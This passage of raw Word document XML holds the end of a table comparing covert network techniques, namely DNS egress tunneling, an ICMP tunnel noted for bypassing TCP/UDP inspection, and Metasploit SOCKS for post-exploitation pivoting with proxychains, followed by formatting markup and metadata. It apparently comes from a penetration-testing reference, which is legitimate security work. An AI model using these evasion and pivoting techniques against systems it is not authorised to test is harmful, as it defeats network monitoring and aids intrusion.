            <w:r w:rsidRPr="00FC0F05">
              <w:t>Reverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7793210B" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F0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2679BDB" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>DNS egress tunneling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="6B64BB26" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27CBAD81" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>ICMP Tunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BCBF99E" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B33EE60" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Reverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424CB9C2" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F0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47F1C13" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Bypass all TCP/UDP-based inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="657D76CD" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126C8E21" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Metasploit SOCKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69953C10" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D2E14DF" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE36770" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F0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E03DE8C" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Post-exploitation pivoting with proxychains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19437D6D" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="4D2F881A" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="39A631E4" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB"/>
    <w:sectPr w:rsidR="002533AB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6B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEA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7C6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0D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6797F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0C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30FF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CB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8598E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD7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C657D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90A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2948">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="467942166">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1287813451">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1535733615">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1818034778">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1426152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AB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33AB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1A676"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{00F73DA4-1A12-417F-9263-46C4314C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94D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AB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A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A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A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A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A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533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AB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5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AB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533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3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2026-04-06T04:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T04:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>